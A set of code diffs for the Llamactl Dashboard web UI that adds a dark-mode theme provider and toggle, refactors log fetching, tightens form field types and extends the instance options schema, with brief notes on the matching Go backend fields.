// Helper functions for pointer fields
func boolPtr(b bool) *bool {
return &b
}
func intPtr(i int) *int {
return &i
}


@@ -7,6 +7,7 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -42,44 +43,50 @@ function App() {
// Show loading spinner while checking auth
if (authLoading) {
return (
<div className="min-h-screen bg-gray-50 flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading...</p>
<ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading...</p>
</div>
</div>
</div>
</ThemeProvider>
);
}
// Show login dialog if not authenticated
if (!isAuthenticated) {
return (
<div className="min-h-screen bg-gray-50">
<LoginDialog open={true} />
</div>
<ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} />
</div>
</ThemeProvider>
);
}
// Show main app if authenticated
return (
<div className="min-h-screen bg-gray-50">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<ThemeProvider>
<div className="min-h-screen bg-background">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
</ThemeProvider>
);
}


@@ -55,6 +55,21 @@ describe('App Component - Critical Business Logic Only', () => {
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
})
afterEach(() => {


@@ -1,6 +1,7 @@
import { Button } from "@/components/ui/button";
import { HelpCircle, LogOut } from "lucide-react";
import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps {
onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
};
return (
<header className="bg-white border-b border-gray-200">
<header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900">
<h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard
</h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
Create Instance
</Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button
variant="outline"
size="icon"


@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return (
<div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p>
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading instances...</p>
</div>
</div>
)
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) {
return (
<div className="text-center py-12">
<div className="text-red-600 mb-4">
<div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p>
</div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) {
return (
<div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p>
<p className="text-foreground text-lg mb-2">No instances found</p>
<p className="text-muted-foreground text-sm">Create your first instance to get started</p>
</div>
)
}
return (
<div className="space-y-4">
<h2 className="text-xl font-semibold text-gray-900 mb-6">
<h2 className="text-xl font-semibold text-foreground mb-6">
Instances ({instances.length})
</h2>


@@ -11,6 +11,7 @@ import {
DialogTitle,
} from '@/components/ui/dialog'
import { Badge } from '@/components/ui/badge'
import { instancesApi } from '@/lib/api'
import {
RefreshCw,
Download,
@@ -46,48 +47,44 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
const refreshIntervalRef = useRef<NodeJS.Timeout | null>(null)
// Fetch logs function
const fetchLogs = async (lines?: number) => {
if (!instanceName) return
const fetchLogs = React.useCallback(
async (lines?: number) => {
if (!instanceName) return
setLoading(true)
setError(null)
setLoading(true)
setError(null)
try {
const params = lines ? `?lines=${lines}` : ''
const response = await fetch(`/api/v1/instances/${instanceName}/logs${params}`)
try {
const logText = await instancesApi.getLogs(instanceName, lines)
setLogs(logText)
if (!response.ok) {
throw new Error(`Failed to fetch logs: ${response.status}`)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
const logText = await response.text()
setLogs(logText)
// Auto-scroll to bottom
setTimeout(() => {
if (logContainerRef.current) {
logContainerRef.current.scrollTop = logContainerRef.current.scrollHeight
}
}, 100)
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to fetch logs')
} finally {
setLoading(false)
}
}
},
[instanceName]
)
// Initial load when dialog opens
useEffect(() => {
if (open && instanceName) {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}
}, [open, instanceName])
}, [open, instanceName, fetchLogs, lineCount])
// Auto-refresh effect
useEffect(() => {
if (autoRefresh && isRunning && open) {
refreshIntervalRef.current = setInterval(() => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
}, 2000) // Refresh every 2 seconds
} else {
if (refreshIntervalRef.current) {
@@ -101,7 +98,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
clearInterval(refreshIntervalRef.current)
}
}
}, [autoRefresh, isRunning, open, lineCount])
}, [autoRefresh, isRunning, open, lineCount, fetchLogs])
// Copy logs to clipboard
const copyLogs = async () => {
@@ -135,7 +132,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
// Apply new line count
const applyLineCount = () => {
fetchLogs(lineCount)
void fetchLogs(lineCount)
setShowSettings(false)
}
@@ -198,7 +195,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<Button
variant="outline"
size="sm"
onClick={() => fetchLogs(lineCount)}
onClick={() => void fetchLogs(lineCount)}
disabled={loading}
>
{loading ? (
@@ -290,7 +287,7 @@ const LogsDialog: React.FC<LogsDialogProps> = ({
<div className="flex items-center gap-2 w-full">
<Button
variant="outline"
onClick={copyLogs}
onClick={() => void copyLogs()}
disabled={!logs}
>
{copied ? (


@@ -19,6 +19,15 @@ import {
} from 'lucide-react'
import { serverApi } from '@/lib/api'
// Helper to get version from environment
const getAppVersion = (): string => {
try {
return (import.meta.env as Record<string, string>).VITE_APP_VERSION || 'unknown'
} catch {
return 'unknown'
}
}
interface SystemInfoModalProps {
open: boolean
onOpenChange: (open: boolean) => void
@@ -109,9 +118,20 @@ const SystemInfoDialog: React.FC<SystemInfoModalProps> = ({
</div>
) : systemInfo ? (
<div className="space-y-6">
{/* Version Section */}
{/* Llamactl Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Version</h3>
<h3 className="font-semibold">Llamactl Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<pre className="text-sm text-gray-300 whitespace-pre-wrap font-mono">
{getAppVersion()}
</pre>
</div>
</div>
{/* Llama Server Version Section */}
<div className="space-y-3">
<h3 className="font-semibold">Llama Server Version</h3>
<div className="bg-gray-900 rounded-lg p-4">
<div className="mb-2">


@@ -7,8 +7,8 @@ import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
value: any
onChange: (key: keyof CreateInstanceOptions, value: any) => void
value: string | number | boolean | string[] | undefined
onChange: (key: keyof CreateInstanceOptions, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
@@ -18,7 +18,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
// Get type from Zod schema
const fieldType = getFieldType(fieldKey)
const handleChange = (newValue: any) => {
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey, newValue)
}
@@ -29,7 +29,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={value || false}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -51,10 +51,14 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input
id={fieldKey}
type="number"
value={value || ''}
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
handleChange(numValue)
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
@@ -101,7 +105,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<Input
id={fieldKey}
type="text"
value={value || ''}
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>


@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}


@@ -1,5 +1,4 @@
import type { CreateInstanceOptions} from '@/schemas/instanceOptions';
import { getAllFieldKeys } from '@/schemas/instanceOptions'
import { type CreateInstanceOptions, getAllFieldKeys } from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default
export const basicFieldsConfig: Record<string, {
@@ -22,6 +21,15 @@ export const basicFieldsConfig: Record<string, {
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
idle_timeout: {
label: 'Idle Timeout (minutes)',
placeholder: '60',
description: 'Time in minutes before instance is considered idle and stopped'
},
on_demand_start: {
label: 'On-Demand Start',
description: 'Start instance upon receiving OpenAI-compatible API request'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
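The two new entries surface the idle-timeout and on-demand-start backend options in the basic form. On the Go side these map to optional fields on instance.CreateInstanceOptions; a hedged sketch using the shared pointer helpers, with Go field names assumed from the JSON keys idle_timeout and on_demand_start:

```go
opts := &instance.CreateInstanceOptions{
	IdleTimeout:   testutil.IntPtr(60),    // minutes of inactivity before stop; assumed field name
	OnDemandStart: testutil.BoolPtr(true), // start on first OpenAI-compatible request; assumed field name
}
```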


@@ -6,6 +6,8 @@ export const CreateInstanceOptionsSchema = z.object({
auto_restart: z.boolean().optional(),
max_restarts: z.number().optional(),
restart_delay: z.number().optional(),
idle_timeout: z.number().optional(),
on_demand_start: z.boolean().optional(),
// Common params
verbose_prompt: z.boolean().optional(),
@@ -14,12 +16,12 @@ export const CreateInstanceOptionsSchema = z.object({
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
priority: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
priority_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
@@ -82,7 +84,7 @@ export const CreateInstanceOptionsSchema = z.object({
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temperature: z.number().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
@@ -109,7 +111,7 @@ export const CreateInstanceOptionsSchema = z.object({
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Server/Example-specific params
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
@@ -149,8 +151,6 @@ export const CreateInstanceOptionsSchema = z.object({
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
// Speculative decoding params
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
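The renames in this hunk (priority → prio, priority_batch → prio_batch, temperature → temp) bring the schema keys in line with llama-server's actual flag names, which the Go backend presumably mirrors as JSON tags on llamacpp.LlamaServerOptions. A sketch of the implied Go side; the field names and tags are assumptions, since this file only shows the TypeScript keys:

```go
// Assumed shape: only the tag values "prio" and "temp" are implied by the schema rename.
type LlamaServerOptions struct {
	Prio int     `json:"prio,omitempty"`
	Temp float64 `json:"temp,omitempty"`
	// ... remaining llama-server flags elided
}
```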

webui/src/vite-env.d.ts (new file)

@@ -0,0 +1,13 @@
/// <reference types="vite/client" />
declare global {
interface ImportMetaEnv {
readonly VITE_APP_VERSION?: string
}
interface ImportMeta {
readonly env: ImportMetaEnv
}
}
export {}


@@ -18,8 +18,9 @@
"baseUrl": ".",
"paths": {
"@/*": ["./src/*"]
}
},
"types": ["vite/client"]
},
"include": ["src"],
"include": ["src", "src/vite-env.d.ts"],
"references": [{ "path": "./tsconfig.node.json" }]
}